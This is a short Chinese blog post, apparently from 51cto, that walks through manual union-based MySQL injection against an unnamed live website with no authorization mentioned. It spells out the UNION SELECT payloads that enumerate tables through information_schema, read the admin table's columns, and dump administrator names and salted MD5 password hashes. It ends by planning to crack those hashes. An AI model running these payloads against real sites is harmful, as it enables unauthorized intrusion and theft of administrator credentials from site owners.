标签:mysql手工注入
今天想实际做一下mysql手工注入,于是找到了某某网站
首先在URL后加一个‘ 报错,说明这个网站可能含有sql注入漏洞,可以进行下一步的测试
目的就是看看能不能直接爆出用户名密码 先用order by看一下这个字段数量
使用and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema = database()抱着试一试的心情看看能不能爆出数据库的表名
这里主要是用到了mysql里边的那个元数据库
执行这个语句后可以看到admin表,里密码不远了
使用这个语句查看一下admin表里边都有什么这里最后table_name需要用HEX
and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name = 0x61646D696E
执行这个语句后发现admin表里边有和用户名密码有关的字段,接下来我们看一下admin表下和用户名密码有关的字段的内容
使用语句:
and 1=2 union select 1,group_concat(admin_password),3,4,5,6,7,8 from admin
and 1=2 union select 1,group_concat(admin_firstname),3,4,5,6,7,8 from admin
and 1=2 union select 1,group_concat(admin_lastname),3,4,5,6,7,8 from admin
这个网站的用户名是存放在两个字段里的,爆出之后需要拼接起来
重要的是密码是三个,两个md5($password,$salt),一个md5,接下来就是找网站解开这三个,这个网站的管理员用户名密码就通过手工注入的方式爆出来了。
标签:mysql手工注入
原文地址:http://huituzi.blog.51cto.com/11569625/1877091